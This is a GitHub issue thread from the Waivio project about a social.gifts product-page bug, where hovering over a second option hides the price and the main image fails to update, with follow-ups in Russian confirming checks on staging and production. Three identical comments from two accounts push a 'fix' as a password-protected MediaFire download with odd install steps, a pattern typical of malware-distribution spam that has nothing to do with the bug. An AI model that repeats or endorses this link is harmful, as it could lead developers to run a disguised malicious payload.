### ISSUE TITLE
[social.gifts / product] There is a second product option on the product page. If you hover over it, the price disappears and the screen gets mixed up, although the price on the second product is also there.

### ISSUE THREAD

**Issue by Diana-Cherry-8** [Waiviogit/waivio#6913]
yammer 3890
social.gifts / product

There is a second product option on the product page. If you hover over it, the price disappears and the screen gets mixed up, although the price on the second product is also there.
https://acceptcryptomap.com/object/bck-ledger-nano-x-amethyst-purple---secure-and-manage-your-crypto--nfts-on-the-go-with-our-bluetooth-enabled-hardware-wallet

![image](https://waivio.nyc3.digitaloceanspaces.com/330c5a22ed242575baa941d3601f70be0e1f435e634d02f95bc2c5136a87eadc)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Diana-Cherry-8** [comment]
При нажатии на другой объект в опциях, главная картинка остается от предыдущего объекта
https://443.socialgifts.pp.ua/object/nww-chicgal-summer-dresses-for-women-beach-cover-ups-strapless-boho-floral-print-sundress


https://github.com/user-attachments/assets/45c67f99-3402-4b7f-a34d-e16fef352690

**Comment by Diana-Cherry-8** [comment]
В целом с других мест, если перейти с объекта на объект, то главная картинка останется с 1го объекта

https://wiv.socialgifts.pp.ua/object/kjn-test-recipe-22081751

https://github.com/user-attachments/assets/dcc00c2b-53ad-413c-aa76-b0d6b03566fe

**Comment by Diana-Cherry-8** [comment]
**Staging checked**

**Comment by Diana-Cherry-8** [comment]
Главная картинка не загружается, если перейти на этот объект, или по ссылке

https://wiv.socialgifts.pp.ua/@wiv01/userShop -> CHICGAL Summer Dresses ...
https://wiv.socialgifts.pp.ua/object/nww-chicgal-summer-dresses-for-women-beach-cover-ups-strapless-boho-floral-print-sundress/menu#qfw-ndp6w-clothes



https://github.com/user-attachments/assets/18708981-7849-43af-a738-8c86eaf96d3f

**Comment by Diana-Cherry-8** [comment]
**Production checked**
